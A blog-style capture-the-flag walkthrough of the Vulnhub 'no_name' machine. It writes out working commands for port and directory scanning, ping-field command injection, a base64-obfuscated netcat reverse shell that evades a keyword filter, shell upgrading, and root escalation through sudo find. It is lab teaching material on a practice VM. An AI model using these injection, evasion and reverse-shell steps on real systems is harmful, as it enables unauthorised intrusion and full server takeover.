This is my first ever Medium post, and my first CTF writeup. “no_name” is a vulnerable machine from Vulnhub which was released by haclabs as part of the haclabs series. Here is my writeup explaining how I exploited this machine from boot to root. Enjoy!

Level: Beginner/Intermediate

Arp-scan or netdiscover can be used to discover the leased IP address. On my network, the machine was assigned the IP address of 192.168.10.42. Let’s scan this machine using nmap.

sudo nmap -sV -p- 192.168.10.42

Port scans using nmap revealed an Apache server was running on port 80. This was the only open port on this machine, and so we can assume that our foothold on this box will be through a vulnerable web-application or script (since this is a CTF, after all!).

Nmap scan report for 192.168.10.42
Host is up (0.0083s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

Visiting the webpage, we can see that we are prompted with a “Fake Admin Area” field. Which, when given a query, returns with a “Fake ping executed”.

index.php showing a response after the query “test” was given.

I wasn’t finding many interesting things on this page even after viewing the source code, so I decided to use dirb to scan for other php pages that may be hosted on the server. (-x .php) specifies which file type we wish to enumerate.

dirb http://192.168.10.42 /usr/share/wordlists/dirb/big.txt -X .php

We found something interesting! The file “superadmin.php” is hosted on the server. Let's take a look!

We can see that we have a ping function to play with - let’s try google.com to see if it actually works.

The ping works! The server is using the ‘ping’ command to provide us with a response — how could we exploit this to execute commands? Let’s do a quick google search.

I came across this webpage which explains how to exploit this type of application. If the user input is not sanitised, we can trick this input field to execute our own commands. After trial and error, I discovered that the character “|” after a loopback ping gives us some basic command execution.

For example:

ping 127.0.0.1 | id

After getting all excited, I tried to get myself a reverse netcat shell. However, this did not work. After viewing the php code of ‘superadmin.php’, it was easy to see why. I did this by using the same above technique, but instead of “id” the command was “cat superadmin.php”.

A portion of the php code for the application.

This makes sense now — the application has restricted certain commands from being executed.. we may need to think outside the box to get this to work. My first idea was to use nc.traditional, however, this would still get detected by the application due to the term “nc”.

How could we make it so that the application can’t see our commands?Encoding! Lets go for Base64.

Get infosecnoodle’s stories in your inbox

Join Medium for free to get updates from this writer.

The command I want to execute:

nc.traditional -e /bin/bash 192.168.10.15 443

Let’s encode this to Base64 using base64encode.org

Now, let’s use this in a command to decode and execute on the server — using the discovered vulnerability.

ping 127.0.0.1 | `echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAuMTUgNDQz" | base64 -d`

Looks good! Now let’s start our netcat listener on the corresponding port (for me, 443) and execute the command on the applicaiton. If this works, we should get a reverse shell calling back to our computer.

Since this is a raw netcat shell, it’s not the best working environment. We can use the following command(s) to determine if python is present on the server to upgrade our shell.

which python
which python3

The server responded with “/usr/bin/python3/” and so we can upgrade our shell using:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Now we have gained a fully interactive tty shell as www-data, we can start enumerating the box further! Let’s take a look at the home directory.

In the user ‘yash’ directory, we can read the first flag which states:

Due to some security issues,I have saved haclabs password in a hidden file.

Since this is an easy/intermediate rated machine, we need to think simple. What command can we use to find hidden files? The “find” command, of course!

Using the following command, we can search through hidden files which are owned by the user yash.

find / -type f -user yash

There we have it! Let’s read that hidden file to see the password of the user haclabs. Once we know the password, we can simply switch users.

Fantastic! We have escalated our privileges to haclabs and we know his password. Let’s go for root!

One of the first things we can do is to try the command “sudo -l” as this will list the commands we can run as root. This is not an option if you don’t know the password of your user — however, we do! Let’s try it.

We can see that our user can run the binary ‘find’ with sudo privilages without the need of a password. This makes things very easy for us! A great resource for this is GTFO Bins. This is basically a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

Let’s see if we can break out to a shell using this binary. Since we can use the command with ‘sudo’ at the start, then we can execute the shell as root — giving us root access to the whole server.

Fantastic! Let’s see what the command is to break out to a shell…

There it is - now let’s use this command on the server with sudo and see what we get back. Here’s the command:

sudo /usr/bin/find . -exec /bin/sh \; -quit

We are now root! We’ve successfully compromised the server and gained full system access. Thanks for reading!

haclabs: no_name - Vulnhub Walkthrough

Get infosecnoodle’s stories in your inbox